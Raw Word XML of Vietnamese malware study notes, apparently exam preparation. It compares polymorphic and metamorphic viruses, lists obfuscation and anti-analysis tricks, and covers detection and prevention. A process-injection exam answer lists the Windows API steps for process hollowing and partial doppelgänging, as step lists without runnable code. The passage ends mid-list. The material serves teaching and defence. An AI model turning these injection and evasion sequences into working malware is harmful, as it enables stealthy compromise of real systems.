            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AAF635A" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:t>Body</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35837579" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:t>Encrypted, giải mã ra giống nhau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F3E6D84" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:t>Encrypted, giải mã ra giống nhau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68FC0A29" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:t>Tự viết lại hoàn toàn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00451406" w:rsidRPr="00451406" w14:paraId="241591D4" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F392238" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:t>Ví dụ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DE2A5F9" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:t>Whale, Memorial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B05FCF3" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>V2PX/1260</w:t>
            </w:r>
            <w:r w:rsidRPr="00451406">
              <w:t xml:space="preserve"> (1990), MtE (Dark Avenger)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FC5D8A9" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>MSIL/Gastropod, Apparition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00451406" w:rsidRPr="00451406" w14:paraId="76104CC8" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A8841F6" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:t>Detect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0857734E" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:t>Signature set decryptors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DEF3142" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:t>Emulation + heuristic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C41741C" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:t>P²det algorithm scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00283465" w:rsidRPr="00C0775B" w14:paraId="3921D7C1" w14:textId="77777777" w:rsidTr="00283465">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37BCDF9F" w14:textId="77777777" w:rsidR="00283465" w:rsidRPr="00C0775B" w:rsidRDefault="00283465" w:rsidP="00ED7D26">
            <w:r w:rsidRPr="00C0775B">
              <w:t>Số biến thể</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63DBA236" w14:textId="77777777" w:rsidR="00283465" w:rsidRPr="00C0775B" w:rsidRDefault="00283465" w:rsidP="00ED7D26">
            <w:r w:rsidRPr="00C0775B">
              <w:t>Vài chục</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BEAEE72" w14:textId="77777777" w:rsidR="00283465" w:rsidRPr="00C0775B" w:rsidRDefault="00283465" w:rsidP="00ED7D26">
            <w:r w:rsidRPr="00C0775B">
              <w:t>Hàng triệu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ECA7CC7" w14:textId="77777777" w:rsidR="00283465" w:rsidRPr="00C0775B" w:rsidRDefault="00283465" w:rsidP="00ED7D26">
            <w:r w:rsidRPr="00C0775B">
              <w:t>Hàng tỷ/tỉ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00283465" w:rsidRPr="00C0775B" w14:paraId="2D1B865F" w14:textId="77777777" w:rsidTr="00283465">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="625ECB85" w14:textId="77777777" w:rsidR="00283465" w:rsidRPr="00C0775B" w:rsidRDefault="00283465" w:rsidP="00ED7D26">
            <w:r w:rsidRPr="00C0775B">
              <w:t>Pri biến đổi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69B2A74C" w14:textId="77777777" w:rsidR="00283465" w:rsidRPr="00C0775B" w:rsidRDefault="00283465" w:rsidP="00ED7D26">
            <w:r w:rsidRPr="00C0775B">
              <w:t>Giải mã (decryptor) chọn ngẫu nhiên</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05C903BA" w14:textId="77777777" w:rsidR="00283465" w:rsidRPr="00C0775B" w:rsidRDefault="00283465" w:rsidP="00ED7D26">
            <w:r w:rsidRPr="00C0775B">
              <w:t>Cấu trúc mã độc (mỗi lần gen mới decryptor)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BA0A661" w14:textId="77777777" w:rsidR="00283465" w:rsidRPr="00C0775B" w:rsidRDefault="00283465" w:rsidP="00ED7D26">
            <w:r w:rsidRPr="00C0775B">
              <w:t>Cấu trúc + nội dung MĐ (tự viết lại)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00283465" w:rsidRPr="00C0775B" w14:paraId="1419CF97" w14:textId="77777777" w:rsidTr="00283465">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FFBEAC2" w14:textId="77777777" w:rsidR="00283465" w:rsidRPr="00C0775B" w:rsidRDefault="00283465" w:rsidP="00ED7D26">
            <w:r w:rsidRPr="00C0775B">
              <w:t>DEP không ngăn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E69DE35" w14:textId="77777777" w:rsidR="00283465" w:rsidRPr="00C0775B" w:rsidRDefault="00283465" w:rsidP="00ED7D26">
            <w:r w:rsidRPr="00C0775B">
              <w:t>Heap virus rớp vào text section → luôn thực thi (buffer overflow thì all vô stack)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E7E66E7" w14:textId="77777777" w:rsidR="00283465" w:rsidRPr="00C0775B" w:rsidRDefault="00283465" w:rsidP="00ED7D26">
            <w:r w:rsidRPr="00C0775B">
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="623E88FA" w14:textId="77777777" w:rsidR="00283465" w:rsidRPr="00C0775B" w:rsidRDefault="00283465" w:rsidP="00ED7D26">
            <w:r w:rsidRPr="00C0775B">
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FA212EC" w14:textId="77777777" w:rsidR="00283465" w:rsidRDefault="00283465" w:rsidP="00451406">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A5E832C" w14:textId="4D19BE30" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Rối mã (Obfuscation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DB2C31" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>String encoding:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> URL/IP/API name mã hóa → decode runtime → strings tool mù</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613B1B48" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API hashing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> không import by name → tính hash tên hàm → walk export table kernel32.dll → IAT trống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33927DF0" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Control flow flattening:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> if/while → state machine switch → disassembler mất dấu logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F61F6E" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Opaque predicates:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> điều kiện luôn true/false nhưng phức tạp → bẫy RE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E207E21" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anti-disassembly:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> junk bytes sau jmp → linear sweep disassembler đọc sai lệnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F93702F" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>④ Phòng chống &amp; Khắc phục:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36439DC1" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Khắc phục:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B07D76B" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve">Dùng </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>emulation/sandboxing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> để decryptor tự chạy → dump body sau giải mã → so signature body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E009B3" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Entropy analysis:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> body mã hóa có entropy ~7.5+ → flag đáng ngờ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE0EC18" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>P²det:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> với mỗi family, remove junk + canonical reorder → tìm unique pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECE4D48" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Phòng chống:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7780AC" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Behavioral detection: giám sát API call sequence bất thường (VirtualAllocEx + WriteProcessMemory + CreateRemoteThread)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72902531" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve">Bật </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AMSI</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> hook vào runtime của PowerShell/JS/VBS → scan trước exec dù đã obfuscate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEFB96C" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>EDR với memory scan: phát hiện vùng nhớ RWX không có backing file (unbacked executable region)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DB70DF" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📝</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CÂU 1 TỰ LUẬN — DẠNG 3: PROCESS INJECTION (~50%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B85FA2B" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Công ty ABC phát hiện tiến trình svchost.exe đang chạy bình thường trong Task Manager, nhưng EDR cảnh báo có kết nối C2 xuất phát từ đúng tiến trình này. Không có file PE lạ nào trên disk. Reboot không giải quyết được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDB37B0" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="409662E3">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF41C5A" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>① Xác định loại malware &amp; kỹ thuật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F07221" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:lastRenderedPageBreak/>
        <w:t>Process Injection — mã độc inject payload vào tiến trình hợp pháp (svchost.exe, explorer.exe) để thực thi dưới danh nghĩa tiến trình tin cậy. Không cần file PE riêng trên disk → AV signature-based bất lực.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B570FC4" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="645C7634">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26049963" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>② Hậu quả giấu hiệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197D33DF" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Task Manager, Process Explorer thấy tên tiến trình hợp lệ → không nghi ngờ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733BC1BC" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Kết nối mạng xuất phát từ svchost.exe → firewall/IDS bỏ qua vì whitelisted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56842D53" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Không có file PE độc hại → forensic disk sạch hoàn toàn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CBB5E0" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Persistence qua Registry/WMI → reboot vẫn tái inject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0D1B5B" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="4A2F9DA1">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADF48C1" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>③ Cơ chế — 3 kỹ thuật trọng tâm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F6CDA9" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process Hollowing</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> (phổ biến nhất):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413C930D" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:t>CreateProcess(SUSPENDED)          → tạo svchost.exe trạng thái treo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE23E93" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:t>ZwUnmapViewOfSection              → giải phóng toàn bộ memory gốc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418779F9" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:t>VirtualAllocEx + WriteProcessMemory → ghi payload vào vùng trống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055F26DE" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:t>SetThreadContext                  → đổi RIP/EIP trỏ vào payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E62CB38" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:t>ResumeThread                      → chạy — vỏ svchost, ruột mã độc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1B0281" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process Doppelgänging</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> (stealth cao nhất, không file):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3BDC90" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:t>CreateTransaction (TxF)           → tạo NTFS transaction ẩn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15896804" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:t>CreateFileTransacted              → tạo file trong transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536823EA" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:t>NtCreateSection                   → load payload vào memory từ file</w:t>
      </w:r>
    </w:p>
